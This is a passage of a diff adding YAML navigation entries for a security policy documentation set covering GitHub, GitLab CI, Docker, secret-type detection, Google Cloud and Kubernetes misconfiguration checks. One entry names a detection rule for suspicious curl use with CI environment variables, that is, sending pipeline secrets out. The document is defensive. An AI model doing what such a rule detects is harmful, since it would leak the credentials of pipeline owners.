GitHub repository webhooks do not use HTTPs + file: ensure-github-organization-and-repository-webhooks-are-using-https.adoc + - name: GitHub organization security settings do not have IP allow list enabled + file: ensure-github-organization-security-settings-has-ip-allow-list-enabled.adoc + - name: GitHub organization security settings do not include 2FA capability + file: ensure-github-organization-security-settings-require-2fa.adoc + - name: GitHub organization security settings do not include SSO + file: ensure-github-organization-security-settings-require-sso.adoc + - name: GitHub organization webhooks do not use HTTPs + file: ensure-github-organization-webhooks-are-using-https.adoc + - name: GitHub Repository doesn't have vulnerability alerts enabled + file: ensure-github-repository-has-vulnerability-alerts-enabled.adoc + - name: GitHub merge requests should require at least 2 approvals + file: merge-requests-should-require-at-least-2-approvals.adoc +- name: Gitlab CI Policies + dir: gitlab-ci-policies + topics: + - name: Rules used could create a double pipeline + file: avoid-creating-rules-that-generate-double-pipelines.adoc + - name: Gitlab CI Policies + file: gitlab-ci-policies.adoc + - name: Suspicious use of curl in a GitLab CI environment + file: suspicious-use-of-curl-with-ci-environment-variables-in-script.adoc +- name: Gitlab Policies + dir: gitlab-policies + topics: + - name: Gitlab organization has groups with no two factor authentication configured + file: ensure-all-gitlab-groups-require-two-factor-authentication.adoc + - name: Gitlab branch protection rules allows force pushes + file: ensure-gitlab-branch-protection-rules-does-not-allow-force-pushes.adoc + - name: Gitlab project commits are not signed + file: ensure-gitlab-commits-are-signed.adoc + - name: Gitlab project does not prevent secrets + file: ensure-gitlab-prevent-secrets-is-enabled.adoc + - name: Gitlab Policies + file: gitlab-policies.adoc + - name: Gitlab project merge has less than 2 approvals + file: merge-requests-do-not-require-two-or-more-approvals-to-merge.adoc +--- +kind: chapter +name: Docker Policies +dir: docker-policies +topics: +- name: Docker Policies + file: docker-policies.adoc +- name: Docker Policy Index + dir: docker-policy-index + topics: + - name: Docker Policy Index + file: docker-policy-index.adoc + - name: Docker From alias is not unique for multistage builds + file: ensure-docker-from-alias-is-unique-for-multistage-builds.adoc + - name: Docker APT is used + file: ensure-docker-apt-is-not-used.adoc + - name: Docker WORKDIR values are not absolute paths + file: ensure-docker-workdir-values-are-absolute-paths.adoc + - name: Port 22 is exposed + file: ensure-port-22-is-not-exposed.adoc + - name: A user for the container has not been created + file: ensure-that-a-user-for-the-container-has-been-created.adoc + - name: Copy is not used instead of Add in Dockerfiles + file: ensure-that-copy-is-used-instead-of-add-in-dockerfiles.adoc + - name: Healthcheck instructions have not been added to container images + file: ensure-that-healthcheck-instructions-have-been-added-to-container-images.adoc + - name: LABEL maintainer is used instead of MAINTAINER (deprecated) + file: ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated.adoc + - name: Base image uses a latest version tag + file: ensure-the-base-image-uses-a-non-latest-version-tag.adoc + - name: Last USER is root + file: ensure-the-last-user-is-not-root.adoc + - name: Update instructions are used alone in a Dockerfile + file: ensure-update-instructions-are-not-used-alone-in-the-dockerfile.adoc +--- +kind: chapter +name: Secrets Policies +dir: secrets-policies +topics: +- name: Secrets Policies + file: secrets-policies.adoc +- name: Secrets Policy Index + dir: secrets-policy-index + topics: + - name: Secrets Policy Index + file: secrets-policy-index.adoc + - name: GitHub repository is not Private + file: ensure-repository-is-private.adoc + - name: Artifactory Credentials + file: git-secrets-1.adoc + - name: Mailchimp Access Key + file: git-secrets-11.adoc + - name: NPM Token + file: git-secrets-12.adoc + - name: Private Key + file: git-secrets-13.adoc + - name: Slack Token + file: git-secrets-14.adoc + - name: SoftLayer Credentials + file: git-secrets-15.adoc + - name: Square OAuth Secret + file: git-secrets-16.adoc + - name: Stripe Access Key + file: git-secrets-17.adoc + - name: Twilio Access Key + file: git-secrets-18.adoc + - name: Hex High Entropy String + file: git-secrets-19.adoc + - name: AWS Access Keys + file: git-secrets-2.adoc + - name: Airtable API Key + file: git-secrets-21.adoc + - name: Algolia Key + file: git-secrets-22.adoc + - name: Alibaba Cloud Keys + file: git-secrets-23.adoc + - name: Asana Key + file: git-secrets-24.adoc + - name: Atlassian Oauth2 Keys + file: git-secrets-25.adoc + - name: Auth0 Keys + file: git-secrets-26.adoc + - name: Bitbucket Keys + file: git-secrets-27.adoc + - name: Buildkite Agent Token + file: git-secrets-28.adoc + - name: CircleCI Personal Token + file: git-secrets-29.adoc + - name: Azure Storage Account Access Keys + file: git-secrets-3.adoc + - name: Codecov API key + file: git-secrets-30.adoc + - name: Coinbase Keys + file: git-secrets-31.adoc + - name: Confluent Keys + file: git-secrets-32.adoc + - name: Databricks Authentication Token + file: git-secrets-33.adoc + - name: DigitalOcean Token + file: git-secrets-34.adoc + - name: Discord Token + file: git-secrets-35.adoc + - name: Doppler API Key + file: git-secrets-36.adoc + - name: DroneCI Token + file: git-secrets-37.adoc + - name: Dropbox App Credentials + file: git-secrets-38.adoc + - name: Dynatrace token + file: git-secrets-39.adoc + - name: Basic Auth Credentials + file: git-secrets-4.adoc + - name: Elastic Email Key + file: git-secrets-40.adoc + - name: Fastly Personal Token + file: git-secrets-41.adoc + - name: FullStory API Key + file: git-secrets-42.adoc + - name: GitHub Token + file: git-secrets-43.adoc + - name: GitLab Token + file: git-secrets-44.adoc + - name: Google Cloud Keys + file: git-secrets-45.adoc + - name: Grafana Token + file: git-secrets-46.adoc + - name: Terraform Cloud API Token + file: git-secrets-47.adoc + - name: Heroku Platform Key + file: git-secrets-48.adoc + - name: HubSpot API Key + file: git-secrets-49.adoc + - name: Cloudant Credentials + file: git-secrets-5.adoc + - name: Intercom Access Token + file: git-secrets-50.adoc + - name: Jira Token + file: git-secrets-51.adoc + - name: LaunchDarkly Personal Token + file: git-secrets-52.adoc + - name: Netlify Token + file: git-secrets-53.adoc + - name: New Relic Key + file: git-secrets-54.adoc + - name: Notion Integration Token + file: git-secrets-55.adoc + - name: Okta Token + file: git-secrets-56.adoc + - name: PagerDuty Authorization Token + file: git-secrets-57.adoc + - name: PlanetScale Token + file: git-secrets-58.adoc + - name: Postman API Key + file: git-secrets-59.adoc + - name: Base64 High Entropy Strings + file: git-secrets-6.adoc + - name: Pulumi Access Token + file: git-secrets-60.adoc + - name: Python Package Index Key + file: git-secrets-61.adoc + - name: RapidAPI Key + file: git-secrets-62.adoc + - name: Readme API Key + file: git-secrets-63.adoc + - name: RubyGems API Key + file: git-secrets-64.adoc + - name: Sentry Token + file: git-secrets-65.adoc + - name: Splunk User Credentials + file: git-secrets-66.adoc + - name: Sumo Logic Keys + file: git-secrets-67.adoc + - name: Telegram Bot Token + file: git-secrets-68.adoc + - name: Travis Personal Token + file: git-secrets-69.adoc + - name: IBM Cloud IAM Key + file: git-secrets-7.adoc + - name: Typeform API Token + file: git-secrets-70.adoc + - name: Vault Unseal Key + file: git-secrets-71.adoc + - name: Yandex Predictor API key + file: git-secrets-72.adoc + - name: Cloudflare API Credentials + file: git-secrets-73.adoc + - name: Vercel API Token + file: git-secrets-74.adoc + - name: Webflow API Token + file: git-secrets-75.adoc + - name: Scalr API Token + file: git-secrets-76.adoc + - name: MongoDB Connection String + file: git-secrets-77.adoc + - name: IBM COS HMAC Credentials + file: git-secrets-8.adoc + - name: JSON Web Token + file: git-secrets-9.adoc +--- +kind: chapter +name: Google Cloud Policies +dir: google-cloud-policies +topics: +- name: Google Cloud Policies + file: google-cloud-policies.adoc +- name: Cloud Sql Policies + dir: cloud-sql-policies + topics: + - name: Cloud Sql Policies + file: cloud-sql-policies.adoc + - name: GCP MySQL instance with local_infile database flag is not disabled + file: bc-gcp-sql-1.adoc + - name: GCP SQL Server instance database flag 'contained database authentication' is enabled + file: bc-gcp-sql-10.adoc + - name: GCP Cloud SQL database instances have public IPs + file: bc-gcp-sql-11.adoc + - name: GCP PostgreSQL instance with log_checkpoints database flag is disabled + file: bc-gcp-sql-2.adoc + - name: GCP PostgreSQL instance database flag log_connections is disabled + file: bc-gcp-sql-3.adoc + - name: GCP PostgreSQL instance database flag log_disconnections is disabled + file: bc-gcp-sql-4.adoc + - name: GCP PostgreSQL instance database flag log_lock_waits is disabled + file: bc-gcp-sql-5.adoc + - name: GCP PostgreSQL instance database flag log_min_messages is not set + file: bc-gcp-sql-6.adoc + - name: GCP PostgreSQL instance database flag log_temp_files is not set to 0 + file: bc-gcp-sql-7.adoc + - name: GCP PostgreSQL instance database flag log_min_duration_statement is not set to -1 + file: bc-gcp-sql-8.adoc + - name: GCP SQL Server instance database flag 'cross db ownership chaining' is enabled + file: bc-gcp-sql-9.adoc +- name: Google Cloud General Policies + dir: google-cloud-general-policies + topics: + - name: Google Cloud General Policies + file: google-cloud-general-policies.adoc + - name: GCP SQL Instances do not have SSL configured for incoming connections + file: bc-gcp-general-1.adoc + - name: GCP SQL database instance does not have backup configuration enabled + file: bc-gcp-general-2.adoc + - name: GCP BigQuery dataset is publicly accessible + file: bc-gcp-general-3.adoc + - name: GCP KMS Symmetric key not rotating in every 90 days + file: bc-gcp-general-4.adoc + - name: GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK) + file: bc-gcp-general-x.adoc + - name: GCP VM instance with Shielded VM features disabled + file: bc-gcp-general-y.adoc + - name: Boot disks for instances do not use CSEKs + file: encrypt-boot-disks-for-instances-with-cseks.adoc + - name: GCP Artifact Registry repositories are not encrypted with Customer Supplied Encryption Keys (CSEK) + file: ensure-gcp-artifact-registry-repositories-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc + - name: GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK) + file: ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc + - name: GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK) + file: ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc + - name: GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs) + file: ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc + - name: GCP cloud build workers are not private + file: ensure-gcp-cloud-build-workers-are-private.adoc + - name: GCP Cloud storage does not have versioning enabled + file: ensure-gcp-cloud-storage-has-versioning-enabled.adoc + - name: GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK) + file: ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc + - name: GCP data fusion instances are not private + file: ensure-gcp-data-fusion-instances-are-private.adoc + - name: GCP DataFusion does not have stack driver logging enabled + file: ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc + - name: GCP DataFusion does not have stack driver monitoring enabled + file: ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc + - name: GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs) + file: ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc + - name: GCP KMS keys are not protected from deletion + file: ensure-gcp-kms-keys-are-protected-from-deletion.adoc + - name: GCP Memorystore for Redis has AUTH disabled + file: ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc + - name: GCP Memorystore for Redis does not use intransit encryption + file: ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc + - name: GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK) + file: ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc + - name: GCP resources that support labels do not have labels + file: ensure-gcp-resources-that-suppot-labels-have-labels.adoc + - name: GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs) + file: ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc + - name: GCP SQL database does not use the latest Major version + file: ensure-gcp-sql-database-uses-the-latest-major-version.adoc + - name: GCP subnet does not have a private IP Google access + file: ensure-gcp-subnet-has-a-private-ip-google-access.adoc + - name: GCP Vertex AI datasets do not use a Customer Manager Key (CMK) + file: ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc + - name: GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK) + file: ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc + - name: GCP KMS crypto key is anonymously accessible + file: ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc + - name: There are not only GCP-managed service account keys for each service account + file: ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc +- name: Google Cloud IAM Policies + dir: google-cloud-iam-policies + topics: + - name: Google Cloud IAM Policies + file: google-cloud-iam-policies.adoc + - name: GCP VM instance configured with default service account + file: bc-gcp-iam-1.adoc + - name: GCP IAM primitive roles are in use + file: bc-gcp-iam-10.adoc + - name: GCP VM instance using a default service account with full access to all Cloud APIs + file: bc-gcp-iam-2.adoc + - name: GCP IAM user are assigned Service Account User or Service Account Token creator roles at project level + file: bc-gcp-iam-3.adoc + - name: GCP IAM Service account does have admin privileges + file: bc-gcp-iam-4.adoc + - name: Roles impersonate or manage Service Accounts used at folder level + file: bc-gcp-iam-5.adoc + - name: Roles impersonate or manage Service Accounts used at organizational level + file: bc-gcp-iam-6.adoc + - name: Default Service Account is used at project level + file: bc-gcp-iam-7.adoc + - name: Default Service Account is used at organization level + file: bc-gcp-iam-8.adoc + - name: Default Service Account is used at folder level + file: bc-gcp-iam-9.adoc + - name: GCP Cloud KMS Key Rings are anonymously or publicly accessible + file: ensure-gcp-cloud-kms-key-rings-is-not-publicly-accessible-1.adoc + - name: A MySQL database instance allows anyone to connect with administrative privileges + file: ensure-that-a-mysql-database-instance-does-not-allow-anyone-to-connect-with-administrative-privileges.adoc +- name: Google Cloud Kubernetes Policies + dir: google-cloud-kubernetes-policies + topics: + - name: Google Cloud Kubernetes Policies + file: google-cloud-kubernetes-policies.adoc + - name: GCP Kubernetes Engine Clusters have Stackdriver Logging disabled + file: bc-gcp-kubernetes-1.adoc + - name: GKE control plane is public + file: bc-gcp-kubernetes-10.adoc + - name: GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled + file: bc-gcp-kubernetes-11.adoc + - name: GCP Kubernetes Engine Clusters have Master authorized networks disabled + file: bc-gcp-kubernetes-12.adoc + - name: GCP Kubernetes Engine Clusters without any label information + file: bc-gcp-kubernetes-13.adoc + - name: GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image + file: bc-gcp-kubernetes-14.adoc + - name: GCP Kubernetes Engine Clusters have Alias IP disabled + file: bc-gcp-kubernetes-15.adoc + - name: GCP Kubernetes Engine Clusters have Legacy Authorization enabled + file: bc-gcp-kubernetes-2.adoc + - name: GCP Kubernetes Engine Clusters have Cloud Monitoring disabled + file: bc-gcp-kubernetes-3.adoc + - name: GCP Kubernetes cluster node auto-repair configuration disabled + file: bc-gcp-kubernetes-4.adoc + - name: GCP Kubernetes cluster node auto-upgrade configuration disabled + file: bc-gcp-kubernetes-5.adoc + - name: GCP Kubernetes Engine private cluster has private endpoint disabled + file: bc-gcp-kubernetes-6.adoc + - name: GCP Kubernetes Engine Clusters have Network policy disabled + file: bc-gcp-kubernetes-7.adoc + - name: GCP Kubernetes engine clusters have client certificate disabled + file: bc-gcp-kubernetes-8.adoc + - name: GCP Kubernetes Engine Clusters have pod security policy disabled + file: bc-gcp-kubernetes-9.adoc + - name: GCP Kubernetes cluster intra-node visibility disabled + file: enable-vpc-flow-logs-and-intranode-visibility.adoc + - name: GCP Kubernetes Engine Clusters not configured with private nodes feature + file: ensure-clusters-are-created-with-private-nodes.adoc + - name: GCP Kubernetes Engine Cluster Nodes have default Service account for Project access + file: ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc + - name: GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled + file: ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc + - name: GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled + file: ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc + - name: GCP Kubernetes cluster shielded GKE node with Secure Boot disabled + file: ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc + - name: GCP Kubernetes cluster Shielded GKE Nodes feature disabled + file: ensure-shielded-gke-nodes-are-enabled.adoc + - name: The GKE metadata server is disabled + file: ensure-the-gke-metadata-server-is-enabled.adoc + - name: GCP Kubernetes Engine cluster not using Release Channel for version management + file: ensure-the-gke-release-channel-is-set.adoc + - name: GCP Kubernetes Engine Clusters have binary authorization disabled + file: ensure-use-of-binary-authorization.adoc + - name: Kubernetes RBAC users are not managed with Google Groups for GKE + file: manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc +- name: Google Cloud Networking Policies + dir: google-cloud-networking-policies + topics: + - name: Google Cloud Networking Policies + file: google-cloud-networking-policies.adoc + - name: GCP Firewall rule allows all traffic on SSH port (22) + file: bc-gcp-networking-1.adoc + - name: GCP Projects have OS Login disabled + file: bc-gcp-networking-10.adoc + - name: GCP VM instances have serial port access enabled + file: bc-gcp-networking-11.adoc + - name: GCP VM instances have IP Forwarding enabled + file: bc-gcp-networking-12.adoc + - name: GCP Firewall rule allows all traffic on RDP port (3389) + file: bc-gcp-networking-2.adoc + - name: GCP HTTPS Load balancer is set with SSL policy having TLS version 1.1 or lower + file: bc-gcp-networking-3.adoc + - name: GCP SQL database is publicly accessible + file: bc-gcp-networking-4.adoc + - name: GCP Cloud DNS has DNSSEC disabled + file: bc-gcp-networking-5.adoc + - name: RSASHA1 is used for Zone-Signing and Key-Signing Keys in Cloud DNS DNSSEC + file: bc-gcp-networking-6.adoc + - name: GCP Kubernetes Engine Clusters using the default network + file: bc-gcp-networking-7.adoc + - name: GCP VM instances do have block project-wide SSH keys feature disabled + file: bc-gcp-networking-8.adoc + - name: GCP Projects do have OS Login disabled + file: bc-gcp-networking-9.adoc + - name: GCP Cloud Armor policy not configured with cve-canary rule + file: ensure-cloud-armor-prevents-message-lookup-in-log4j2.adoc + - name: GCP Cloud Function HTTP trigger is not secured + file: ensure-gcp-cloud-function-http-trigger-is-secured.adoc + - name: GCP Firewall rule allows all traffic on MySQL DB port (3306) + file: ensure-gcp-compute-firewall-ingress-does-not-allow-unrestricted-mysql-access.adoc + - name: GCP Firewall rule allows all traffic on MySQL DB port (3306) + file: ensure-gcp-firewall-rule-does-not-allows-all-traffic-on-mysql-port-3306.adoc + - name: GCP GCR Container Vulnerability Scanning is disabled + file: ensure-gcp-gcr-container-vulnerability-scanning-is-enabled.adoc + - name: GCP Google compute firewall ingress allow FTP port (20) access + file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-ftp-port-20-access.adoc + - name: GCP Firewall with Inbound rule overly permissive to All Traffic + file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-access-to-all-ports.adoc + - name: GCP Firewall rule allows all traffic on FTP port (21) + file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-ftp-access.adoc + - name: GCP Firewall rule allows all traffic on HTTP port (80) + file: ensure-gcp-google-compute-firewall-ingress-does-not-allow-unrestricted-http-port-80-access.adoc + - name: GCP VPC Network subnets have Private Google access disabled + file: ensure-gcp-private-google-access-is-enabled-for-ipv6.adoc + - name: GCP project is configured with legacy network + file: ensure-legacy-networks-do-not-exist-for-a-project.adoc +- name: Google Cloud Public Policies + dir: google-cloud-public-policies + topics: + - name: Google Cloud Public Policies + file: google-cloud-public-policies.adoc + - name: GCP Storage buckets has public access to all authenticated users + file: bc-gcp-public-1.adoc + - name: GCP VM instance with the external IP address + file: bc-gcp-public-2.adoc + - name: GCP Cloud Run services are anonymously or publicly accessible + file: ensure-cloud-run-service-is-not-anonymously-or-publicly-accessible.adoc + - name: GCP Artifact Registry repositories are anonymously or publicly accessible + file: ensure-gcp-artifact-registry-repository-is-not-anonymously-or-publicly-accessible.adoc + - name: GCP BigQuery Tables are anonymously or publicly accessible + file: ensure-gcp-bigquery-table-is-not-publicly-accessible.adoc + - name: GCP Dataflow jobs are not private + file: ensure-gcp-cloud-dataflow-job-has-public-ips.adoc + - name: GCP KMS crypto key is anonymously accessible + file: ensure-gcp-cloud-kms-cryptokey-is-not-anonymously-or-publicly-accessible.adoc + - name: GCP Dataproc Clusters have public IPs + file: ensure-gcp-dataproc-cluster-does-not-have-a-public-ip.adoc + - name: GCP Dataproc clusters are anonymously or publicly accessible + file: ensure-gcp-dataproc-cluster-is-not-anonymously-or-publicly-accessible.adoc + - name: GCP Pub/Sub Topics are anonymously or publicly accessible + file: ensure-gcp-pubsub-topic-is-not-anonymously-or-publicly-accessible.adoc + - name: GCP Vertex AI instances are not private + file: ensure-gcp-vertex-ai-workbench-does-not-have-public-ips.adoc + - name: GCP Container Registry repositories are anonymously or publicly accessible + file: ensure-google-container-registry-repository-is-not-anonymously-or-publicly-accessible.adoc +- name: Google Cloud Storage Gcs Policies + dir: google-cloud-storage-gcs-policies + topics: + - name: Google Cloud Storage Gcs Policies + file: google-cloud-storage-gcs-policies.adoc + - name: GCP cloud storage bucket with uniform bucket-level access disabled + file: bc-gcp-gcs-2.adoc + - name: GCP Storage Bucket does not have Access and Storage Logging enabled + file: bc-gcp-logging-2.adoc + - name: GCP storage bucket is logging to itself + file: bc-gcp-logging-3.adoc +- name: Logging Policies 1 + dir: logging-policies-1 + topics: + - name: Logging Policies 1 + file: logging-policies-1.adoc + - name: GCP VPC Flow logs for the subnet is set to Off + file: bc-gcp-logging-1.adoc + - name: GCP Project audit logging is not configured properly across all services and all users in a project + file: ensure-that-cloud-audit-logging-is-configured-properly-across-all-services-and-all-users-from-a-project.adoc + - name: GCP Log bucket retention policy is not configured using bucket lock + file: ensure-that-retention-policies-on-log-buckets-are-configured-using-bucket-lock.adoc +--- +kind: chapter +name: Kubernetes Policies +dir: kubernetes-policies +topics: +- name: Kubernetes Policies + file: kubernetes-policies.adoc +- name: Kubernetes Policy Index + dir: kubernetes-policy-index + topics: + - name: Kubernetes Policy Index + file: kubernetes-policy-index.adoc + - name: Containers wishing to share host process ID namespace admitted + file: bc-k8s-1.adoc + - name: CPU limits are not set + file: bc-k8s-10.adoc + - name: Memory requests are not set + file: bc-k8s-11.adoc + - name: Memory limits are not set + file: bc-k8s-12.adoc + - name: Image tag is not set to Fixed + file: bc-k8s-13.adoc + - name: Image pull policy is not set to Always + file: bc-k8s-14.adoc + - name: Container is privileged + file: bc-k8s-15.adoc + - name: Containers share host process ID namespace + file: bc-k8s-16.adoc + - name: Containers share host IPC namespace + file: bc-k8s-17.adoc + - name: Containers share the host network namespace + file: bc-k8s-18.adoc + - name: Containers run with AllowPrivilegeEscalation + file: bc-k8s-19.adoc + - name: Privileged containers are admitted + file: bc-k8s-2.adoc + - name: Default namespace is used + file: bc-k8s-20.adoc + - name: Read-Only filesystem for containers is not used + file: bc-k8s-21.adoc + - name: Admission of root containers not minimized + file: bc-k8s-22.adoc + - name: Containers with added capability are allowed + file: bc-k8s-23.adoc + - name: Admission of containers with added capability is not minimized + file: bc-k8s-24.adoc + - name: hostPort is specified + file: bc-k8s-25.adoc + - name: Mounting Docker socket daemon in a container is not limited + file: bc-k8s-26.adoc + - name: Admission of containers with NET_RAW capability is not minimized + file: bc-k8s-27.adoc + - name: securityContext is not applied to pods and containers in container context + file: bc-k8s-28.adoc + - name: seccomp is not set to Docker/Default or Runtime/Default + file: bc-k8s-29.adoc + - name: Containers wishing to share host IPC namespace admitted + file: bc-k8s-3.adoc + - name: seccomp profile is not set to Docker/Default or Runtime/Default + file: bc-k8s-30.adoc + - name: Kubernetes dashboard is deployed + file: bc-k8s-31.adoc + - name: Tiller (Helm V2) is deployed + file: bc-k8s-32.adoc + - name: Secrets used as environment variables + file: bc-k8s-33.adoc + - name: Admission of containers with capabilities assigned is not limited + file: bc-k8s-34.adoc + - name: Service account tokens are not mounted where necessary + file: bc-k8s-35.adoc + - name: CAP_SYS_ADMIN Linux capability is used + file: bc-k8s-36.adoc + - name: Containers do not run with a high UID + file: bc-k8s-37.adoc + - name: Default service accounts are actively used + file: bc-k8s-38.adoc + - name: Images are not selected using a digest + file: bc-k8s-39.adoc + - name: Containers wishing to share host network namespace admitted + file: bc-k8s-4.adoc + - name: Tiller (Helm V2) deployment is accessible from within the cluster + file: bc-k8s-40.adoc + - name: Tiller (Helm v2) service is not deleted + file: bc-k8s-41.adoc + - name: Root containers admitted + file: bc-k8s-5.adoc + - name: Containers with NET_RAW capability admitted + file: bc-k8s-6.adoc + - name: Liveness probe is not configured + file: bc-k8s-7.adoc + - name: Readiness probe is not configured + file: bc-k8s-8.adoc + - name: CPU request is not set + file: bc-k8s-9.adoc + - name: Kubernetes ClusterRoles that grant control over validating or mutating admission webhook configurations are not minimized + file: ensure-clusterroles-that-grant-control-over-validating-or-mutating-admission-webhook-configurations-are-minimized.adoc + - name: Kubernetes ClusterRoles that grant permissions to approve CertificateSigningRequests are not minimized + file: ensure-clusterroles-that-grant-permissions-to-approve-certificatesigningrequests-are-minimized.adoc + - name: Containers run with AllowPrivilegeEscalation based on Pod Security Policy setting + file: ensure-containers-do-not-run-with-allowprivilegeescalation.adoc + - name: Default Kubernetes service accounts are actively used by bounding to a role or cluster role + file: ensure-default-service-accounts-are-not-actively-used.adoc + - name: Wildcard use is not minimized in Roles and ClusterRoles + file: ensure-minimized-wildcard-use-in-roles-and-clusterroles.adoc + - name: Kubernetes Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings are not minimized + file: ensure-roles-and-clusterroles-that-grant-permissions-to-bind-rolebindings-or-clusterrolebindings-are-minimized.adoc + - name: Kubernetes Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRole are not minimized + file: ensure-roles-and-clusterroles-that-grant-permissions-to-escalate-roles-or-clusterrole-are-minimized.adoc + - name: securityContext is not applied to pods and containers + file: ensure-securitycontext-is-applied-to-pods-and-containers.adoc + - name: The admission control plugin AlwaysAdmit is set + file: ensure-that-the-admission-control-plugin-alwaysadmit-is-not-set.adoc + - name: The admission control plugin AlwaysPullImages is not set + file: ensure-that-the-admission-control-plugin-alwayspullimages-is-set.adoc + - name: The admission control plugin EventRateLimit is not set + file: ensure-that-the-admission-control-plugin-eventratelimit-is-set.adoc + - name: The admission control plugin NamespaceLifecycle is not set + file: ensure-that-the-admission-control-plugin-namespacelifecycle-is-set.adoc + - name: The admission control plugin NodeRestriction is not set + file: ensure-that-the-admission-control-plugin-noderestriction-is-set.adoc + - name: The admission control plugin PodSecurityPolicy is not set + file: ensure-that-the-admission-control-plugin-podsecuritypolicy-is-set.adoc + - name: The admission control plugin SecurityContextDeny is set if PodSecurityPolicy is used + file: ensure-that-the-admission-control-plugin-securitycontextdeny-is-set-if-podsecuritypolicy-is-not-used.adoc + - name: The admission control plugin ServiceAccount is not set + file: ensure-that-the-admission-control-plugin-serviceaccount-is-set.adoc + - name: The --anonymous-auth argument is not set to False for API server + file: ensure-that-the-anonymous-auth-argument-is-set-to-false-1.adoc + - name: The --anonymous-auth argument is not set to False for Kubelet + file: ensure-that-the-anonymous-auth-argument-is-set-to-false.adoc + - name: The API server does not make use of strong cryptographic ciphers + file: ensure-that-the-api-server-only-makes-use-of-strong-cryptographic-ciphers.adoc + - name: The --audit-log-maxage argument is not set appropriately + file: ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc + - name: The --audit-log-maxbackup argument is not set appropriately + file: ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc + - name: The --audit-log-maxsize argument is not set appropriately + file: ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc + - name: The --audit-log-path argument is not set + file: ensure-that-the-audit-log-path-argument-is-set.adoc + - name: The --authorization-mode argument does not include node + file: ensure-that-the-authorization-mode-argument-includes-node.adoc + - name: The --authorization-mode argument does not include RBAC + file: ensure-that-the-authorization-mode-argument-includes-rbac.adoc + - name: The --authorization-mode argument is set to AlwaysAllow for Kubelet + file: ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc + - name: The --authorization-mode argument is set to AlwaysAllow for API server + file: ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc + - name: The --auto-tls argument is set to True + file: ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc + - name: The --basic-auth-file argument is Set + file: ensure-that-the-basic-auth-file-argument-is-not-set.adoc + - name: The --bind-address argument is not set to 127.0.0.1 + file: ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc + - name: The --bind-address argument for controller managers is not set to 127.0.0.1 + file: ensure-that-the-bind-address-argument-is-set-to-127001.adoc + - name: The --cert-file and --key-file arguments are not set appropriately + file: ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc + - name: The --client-ca-file argument for API Servers is not set appropriately + file: ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc + - name: The --client-cert-auth argument is not set to True + file: ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc + - name: The --etcd-cafile argument is not set appropriately + file: ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc + - name: Encryption providers are not appropriately configured + file: ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc + - name: The --etcd-certfile and --etcd-keyfile arguments are not set appropriately + file: ensure-that-the-etcd-certfile-and-etcd-keyfile-arguments-are-set-as-appropriate.adoc + - name: The --event-qps argument is not set to a level that ensures appropriate event capture + file: ensure-that-the-event-qps-argument-is-set-to-0-or-a-level-which-ensures-appropriate-event-capture.adoc + - name: The --hostname-override argument is set + file: ensure-that-the-hostname-override-argument-is-not-set.adoc + - name: The --insecure-bind-address argument is set + file: ensure-that-the-insecure-bind-address-argument-is-not-set.adoc + - name: The --insecure-port argument is not set to 0 + file: ensure-that-the-insecure-port-argument-is-set-to-0.adoc + - name: The --kubelet-certificate-authority argument is not set appropriately + file: ensure-that-the-kubelet-certificate-authority-argument-is-set-as-appropriate.adoc + - name: The --kubelet-client-certificate and --kubelet-client-key arguments are not set appropriately + file: 